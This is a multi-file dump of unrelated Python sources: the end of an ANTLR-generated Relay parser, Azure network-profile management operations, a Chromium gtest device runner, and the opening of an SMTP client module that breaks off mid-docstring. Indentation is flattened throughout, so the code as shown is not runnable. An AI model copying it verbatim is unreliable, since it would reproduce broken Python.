return visitor.visitChildren(self)
def ident(self):
localctx = RelayParser.IdentContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_ident)
try:
self.state = 327
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [RelayParser.CNAME]:
self.enterOuterAlt(localctx, 1)
self.state = 323
self.opIdent()
pass
elif token in [RelayParser.GLOBAL_VAR]:
self.enterOuterAlt(localctx, 2)
self.state = 324
self.match(RelayParser.GLOBAL_VAR)
pass
elif token in [RelayParser.LOCAL_VAR]:
self.enterOuterAlt(localctx, 3)
self.state = 325
self.match(RelayParser.LOCAL_VAR)
pass
elif token in [RelayParser.GRAPH_VAR]:
self.enterOuterAlt(localctx, 4)
self.state = 326
self.match(RelayParser.GRAPH_VAR)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):
        if self._predicates is None:
self._predicates = dict()
self._predicates[2] = self.expr_sempred
pred = self._predicates.get(ruleIndex, None)
if pred is None:
raise Exception("No predicate with index:" + str(ruleIndex))
else:
return pred(localctx, predIndex)
def expr_sempred(self, localctx:ExprContext, predIndex:int):
if predIndex == 0:
return self.precpred(self._ctx, 16)
if predIndex == 1:
return self.precpred(self._ctx, 15)
if predIndex == 2:
return self.precpred(self._ctx, 14)
if predIndex == 3:
return self.precpred(self._ctx, 13)
if predIndex == 4:
return self.precpred(self._ctx, 4)
if predIndex == 5:
return self.precpred(self._ctx, 18)
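# A minimal sketch of driving this generated parser with the antlr4 Python
# runtime. The RelayLexer module and the "prog" entry rule are assumptions
# based on common ANTLR conventions; neither appears in this file.
def _parse_relay_example(source):
    from antlr4 import InputStream, CommonTokenStream  # standard antlr4 runtime
    from RelayLexer import RelayLexer  # hypothetical companion lexer module
    lexer = RelayLexer(InputStream(source))
    parser = RelayParser(CommonTokenStream(lexer))
    return parser.prog()  # hypothetical top-level entry rule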
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkProfilesOperations(object):
"""NetworkProfilesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_08_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_profile_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_profile_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified network profile.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the NetworkProfile.
:type network_profile_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_profile_name=network_profile_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
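    # A minimal sketch of driving the LRO above, assuming `ops` is an instance
    # of this class obtained from a versioned NetworkManagementClient:
    #
    #   poller = ops.begin_delete("my-rg", "my-profile")  # placeholder names
    #   poller.result()  # block until the service reports completion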
def get(
self,
resource_group_name, # type: str
network_profile_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkProfile"
"""Gets the specified network profile in a specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
        :param network_profile_name: The name of the network profile.
:type network_profile_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkProfile, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def create_or_update(
self,
resource_group_name, # type: str
network_profile_name, # type: str
parameters, # type: "_models.NetworkProfile"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkProfile"
"""Creates or updates a network profile.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the network profile.
:type network_profile_name: str
:param parameters: Parameters supplied to the create or update network profile operation.
:type parameters: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkProfile, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkProfile')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def update_tags(
self,
resource_group_name, # type: str
network_profile_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkProfile"
"""Updates network profile tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_profile_name: The name of the network profile.
:type network_profile_name: str
:param parameters: Parameters supplied to update network profile tags.
:type parameters: ~azure.mgmt.network.v2018_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkProfile, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_08_01.models.NetworkProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_tags.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkProfileName': self._serialize.url("network_profile_name", network_profile_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles/{networkProfileName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkProfileListResult"]
"""Gets all the network profiles in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkProfileListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.NetworkProfileListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfileListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkProfileListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkProfiles'} # type: ignore
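    # ItemPaged drives the two nested callbacks above: get_next issues one GET
    # per page (following next_link when present) and extract_data yields
    # (next_link, iterator of NetworkProfile). A sketch of consuming it, with
    # `ops` assumed to be an instance of this class:
    #
    #   for profile in ops.list_all():
    #       print(profile.name)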
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.NetworkProfileListResult"]
"""Gets all network profiles in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkProfileListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2018_08_01.models.NetworkProfileListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkProfileListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkProfileListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkProfiles'} # type: ignore
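# A minimal sketch of reaching this operations group through the versioned
# client. DefaultAzureCredential and the `network_profiles` attribute are
# assumptions about packages outside this file (azure-identity,
# azure-mgmt-network).
def _get_profile_example(subscription_id):
    from azure.identity import DefaultAzureCredential  # assumed dependency
    from azure.mgmt.network import NetworkManagementClient
    client = NetworkManagementClient(DefaultAzureCredential(), subscription_id)
    return client.network_profiles.get("my-rg", "my-profile")  # placeholder names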
| |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
from pylib import constants
from pylib import ports
from pylib.base import test_run
from pylib.device import device_errors
from pylib.gtest import gtest_test_instance
from pylib.local import local_test_server_spawner
from pylib.local.device import local_device_environment
from pylib.local.device import local_device_test_run
from pylib.utils import apk_helper
from pylib.utils import device_temp_file
_COMMAND_LINE_FLAGS_SUPPORTED = True
_EXTRA_COMMAND_LINE_FILE = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFile')
_EXTRA_COMMAND_LINE_FLAGS = (
'org.chromium.native_test.ChromeNativeTestActivity.CommandLineFlags')
_EXTRA_ENABLE_TEST_SERVER_SPAWNER = (
'org.chromium.native_test.ChromeNativeTestInstrumentationTestRunner'
'.EnableTestServerSpawner')
_MAX_SHARD_SIZE = 256
# TODO(jbudorick): Move this up to the test instance if the net test server is
# handled outside of the APK for the remote_device environment.
_SUITE_REQUIRES_TEST_SERVER_SPAWNER = [
'content_unittests', 'content_browsertests', 'net_unittests', 'unit_tests'
]
class _ApkDelegate(object):
def __init__(self, apk):
self._apk = apk
self._package = apk_helper.GetPackageName(self._apk)
self._runner = apk_helper.GetInstrumentationName(self._apk)
self._component = '%s/%s' % (self._package, self._runner)
self._enable_test_server_spawner = False
def EnableTestServerSpawner(self):
self._enable_test_server_spawner = True
def Install(self, device):
device.Install(self._apk)
def RunWithFlags(self, device, flags, **kwargs):
with device_temp_file.DeviceTempFile(device.adb) as command_line_file:
device.WriteFile(command_line_file.name, '_ %s' % flags)
extras = {
_EXTRA_COMMAND_LINE_FILE: command_line_file.name,
}
if self._enable_test_server_spawner:
extras[_EXTRA_ENABLE_TEST_SERVER_SPAWNER] = '1'
return device.StartInstrumentation(
self._component, extras=extras, raw=False, **kwargs)
def Clear(self, device):
device.ClearApplicationState(self._package)
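# For example, RunWithFlags(device, '--gtest_filter=Foo.Bar') writes
# "_ --gtest_filter=Foo.Bar" to a device temp file (the leading "_" is a
# throwaway argv[0]) and hands the file's path to the instrumentation via
# _EXTRA_COMMAND_LINE_FILE.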
class _ExeDelegate(object):
def __init__(self, exe, tr):
self._exe_host_path = exe
self._exe_file_name = os.path.split(exe)[-1]
self._exe_device_path = '%s/%s' % (
constants.TEST_EXECUTABLE_DIR, self._exe_file_name)
deps_host_path = self._exe_host_path + '_deps'
if os.path.exists(deps_host_path):
self._deps_host_path = deps_host_path
self._deps_device_path = self._exe_device_path + '_deps'
else:
self._deps_host_path = None
self._test_run = tr
def EnableTestServerSpawner(self):
pass
def Install(self, device):
# TODO(jbudorick): Look into merging this with normal data deps pushing if
# executables become supported on nonlocal environments.
host_device_tuples = [(self._exe_host_path, self._exe_device_path)]
if self._deps_host_path:
host_device_tuples.append((self._deps_host_path, self._deps_device_path))
device.PushChangedFiles(host_device_tuples)
def RunWithFlags(self, device, flags, **kwargs):
cmd = [
self._test_run.GetTool(device).GetTestWrapper(),
self._exe_device_path,
flags,
]
cwd = constants.TEST_EXECUTABLE_DIR
env = {
'LD_LIBRARY_PATH':
'%s/%s_deps' % (constants.TEST_EXECUTABLE_DIR, self._exe_file_name),
}
try:
gcov_strip_depth = os.environ['NATIVE_COVERAGE_DEPTH_STRIP']
external = device.GetExternalStoragePath()
env['GCOV_PREFIX'] = '%s/gcov' % external
env['GCOV_PREFIX_STRIP'] = gcov_strip_depth
except (device_errors.CommandFailedError, KeyError):
pass
# TODO(jbudorick): Switch to just RunShellCommand once perezju@'s CL
# for long shell commands lands.
with device_temp_file.DeviceTempFile(device.adb) as script_file:
script_contents = ' '.join(cmd)
      logging.info('script contents: %r', script_contents)
device.WriteFile(script_file.name, script_contents)
output = device.RunShellCommand(['sh', script_file.name], cwd=cwd,
env=env, **kwargs)
return output
def Clear(self, device):
try:
device.KillAll(self._exe_file_name, blocking=True, timeout=30, retries=0)
except device_errors.CommandFailedError:
# Raised if there is no process with the given name, which in this case
# is all we care about.
pass
class LocalDeviceGtestRun(local_device_test_run.LocalDeviceTestRun):
def __init__(self, env, test_instance):
assert isinstance(env, local_device_environment.LocalDeviceEnvironment)
assert isinstance(test_instance, gtest_test_instance.GtestTestInstance)
super(LocalDeviceGtestRun, self).__init__(env, test_instance)
if self._test_instance.apk:
self._delegate = _ApkDelegate(self._test_instance.apk)
elif self._test_instance.exe:
      self._delegate = _ExeDelegate(self._test_instance.exe, self)
#override
def TestPackage(self):
return self._test_instance._suite
#override
def SetUp(self):
def individual_device_set_up(dev, host_device_tuples):
# Install test APK.
self._delegate.Install(dev)
# Push data dependencies.
external_storage = dev.GetExternalStoragePath()
host_device_tuples = [
(h, d if d is not None else external_storage)
for h, d in host_device_tuples]
dev.PushChangedFiles(host_device_tuples)
if self.TestPackage() in _SUITE_REQUIRES_TEST_SERVER_SPAWNER:
self._delegate.EnableTestServerSpawner()
self._env.parallel_devices.pMap(individual_device_set_up,
self._test_instance.GetDataDependencies())
#override
def _ShouldShard(self):
return True
#override
def _CreateShards(self, tests):
device_count = len(self._env.devices)
shards = []
for i in xrange(0, device_count):
unbounded_shard = tests[i::device_count]
shards += [unbounded_shard[j:j+_MAX_SHARD_SIZE]
for j in xrange(0, len(unbounded_shard), _MAX_SHARD_SIZE)]
return [':'.join(s) for s in shards]
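  # Worked example: with 2 devices, tests [t0..t5] and _MAX_SHARD_SIZE = 2,
  # the round-robin split above gives [t0, t2, t4] and [t1, t3, t5]; chunking
  # then yields the shards ['t0:t2', 't4', 't1:t3', 't5'], each usable as a
  # single --gtest_filter value.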
#override
def _GetTests(self):
tests = self._delegate.RunWithFlags(
self._env.devices[0], '--gtest_list_tests')
tests = gtest_test_instance.ParseGTestListTests(tests)
tests = self._test_instance.FilterTests(tests)
return tests
#override
def _RunTest(self, device, test):
# Run the test.
output = self._delegate.RunWithFlags(device, '--gtest_filter=%s' % test,
timeout=900, retries=0)
self._delegate.Clear(device)
# Parse the output.
# TODO(jbudorick): Transition test scripts away from parsing stdout.
results = self._test_instance.ParseGTestOutput(output)
return results
#override
def TearDown(self):
pass
| |
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
'''SMTP/ESMTP client class.
This should follow RFC 821 (SMTP), RFC 1869 (ESMTP), RFC 2554 (SMTP
Authentication) and RFC 2487 (Secure SMTP over TLS).
Notes:
Please remember, when doing ESMTP, that the names of the SMTP service
extensions are NOT the same thing as the option keywords for the RCPT
and MAIL commands!
Example:
>>> import smtplib
>>> s=smtplib.SMTP("localhost")
>>> print(s.help())
This is Sendmail version 8.8.4
Topics:
HELO EHLO MAIL RCPT DATA
RSET NOOP QUIT HELP VRFY
EXPN VERB ETRN DSN
For more info use "HELP <topic>".
To report bugs in the implementation send email to
sendmail-bugs@sendmail.org.
For local information send email to Postmaster at your site.
End of HELP info
>>> s.putcmd(b"vrfy","someone@here")
>>> s.getreply()
(250, "Somebody OverHere <somebody@here.my.org>")
>>> s.quit()
'''
# Author: The Dragon De Monsyne <dragondm@integral.org>
# ESMTP support, test code and doc fixes added by
# Eric S. Raymond <esr@thyrsus.com>
# Better RFC 821 compliance (MAIL and RCPT, and CRLF in data)
# by Carey Evans <c.evans@clear.net.nz>, for picky mail servers.
# RFC 2554 (authentication) support by Gerhard Haering <gerhard@bigfoot.de>.
#
# This was modified from the Python 1.5 library HTTP lib.
#
# Extensive modifications by Keith Dart <kdart@kdart.com>.
import re
from email.utils import parseaddr
import types
import base64
import hmac
from errno import EINTR, ECONNREFUSED
from io import BytesIO
import socket
import ssl
from pycopia.OS import scheduler
SMTP_PORT = 25
CRLF=b"\r\n"
DOTCRLF=b".\r\n"
OLDSTYLE_AUTH = re.compile(r"auth=(.*)", re.I)
def encode_base64(s, eol=None):
    if isinstance(s, str):
        s = s.encode("ascii")
    return "".join(base64.encodebytes(s).decode("ascii").split("\n"))
# Exception classes used by this module.
class SMTPException(Exception):
"""Base class for all exceptions raised by this module."""
class SMTPServerDisconnected(SMTPException):
"""Not connected to any SMTP server.
This exception is raised when the server unexpectedly disconnects,
or when an attempt is made to use the SMTP instance before
connecting it to a server.
"""
class SMTPResponseException(SMTPException):
"""Base class for all exceptions that include an SMTP error code.
These exceptions are generated in some instances when the SMTP
server returns an error code. The error code is stored in the
`smtp_code` attribute of the error, and the `smtp_error` attribute
is set to the error message.
"""
def __init__(self, code, msg):
self.smtp_code = code
self.smtp_error = msg
self.args = (code, msg)
class SMTPSenderRefused(SMTPResponseException):
"""Sender address refused.
In addition to the attributes set by on all SMTPResponseException
exceptions, this sets `sender` to the string that the SMTP refused.
"""
def __init__(self, code, msg, sender):
self.smtp_code = code
self.smtp_error = msg
self.sender = sender
self.args = (code, msg, sender)
class SMTPRecipientsRefused(SMTPException):
"""All recipient addresses refused.
The errors for each recipient are accessible through the attribute
'recipients', which is a dictionary of exactly the same sort as
SMTP.sendmail() returns.
"""
def __init__(self, recipients):
self.recipients = recipients
self.args = ( recipients,)
class SMTPDataError(SMTPResponseException):
"""The SMTP server didn't accept the data."""
class SMTPConnectError(SMTPResponseException):
"""Error during connection establishment."""
class SMTPHeloError(SMTPResponseException):
"""The server refused our HELO reply."""
class SMTPAuthenticationError(SMTPResponseException):
"""Authentication error.
Most probably the server didn't accept the username/password
combination provided.
"""
class SSLFakeSocket(object):
"""A fake socket object that really wraps a SSLObject.
It only supports what is needed in smtplib.
"""
def __init__(self, realsock, sslobj):
self.realsock = realsock
self.sslobj = sslobj
    def send(self, data):
        self.sslobj.write(data)
        return len(data)
sendall = send
def close(self):
self.realsock.close()
class SSLFakeFile(object):
"""A fake file like object that really wraps a SSLObject.
It only supports what is needed in smtplib.
"""
def __init__( self, sslobj):
self.sslobj = sslobj
    def readline(self):
        line = b""
        char = None
        while char != b"\n":
            char = self.sslobj.read(1)
            line += char
        return line
def close(self):
pass
def quoteaddr(addr):
"""Quote a subset of the email addresses defined by RFC 821.
"""
m=parseaddr(addr)[1]
return "<%s>" % m
def quotedata(data):
"""Quote data for email.
Double leading '.', and change Unix newline '\\n', or Mac '\\r' into
Internet CRLF end-of-line.
"""
    return re.sub(r'(?m)^\.', '..',
        re.sub(r'(?:\r\n|\n|\r(?!\n))', "\r\n", data))
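# For example, quotedata("a\n.b") returns "a\r\n..b": the bare LF becomes a
# CRLF and the leading '.' is doubled, per the transparency rules of RFC 821
# section 4.5.2.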
class SMTP(object):
"""This class manages a connection to an SMTP or ESMTP server.
SMTP objects have the following attributes::
helo_resp
This is the message given by the server in response to the
most recent HELO command.
ehlo_resp
This is the message given by the server in response to the
most recent EHLO command. This is usually multiline.
does_esmtp
This is a True value _after you do an EHLO command, if the
server supports ESMTP.
esmtp_features
This is a dictionary, which, if the server supports ESMTP,
will _after you do an EHLO command, contain the names of the
SMTP service extensions this server supports, and their
parameters (if any).
Note, all extension names are mapped to lower case in the
dictionary.
See each method's docstrings for details. In general, there is a
method of the same name to perform each SMTP command. There is also a
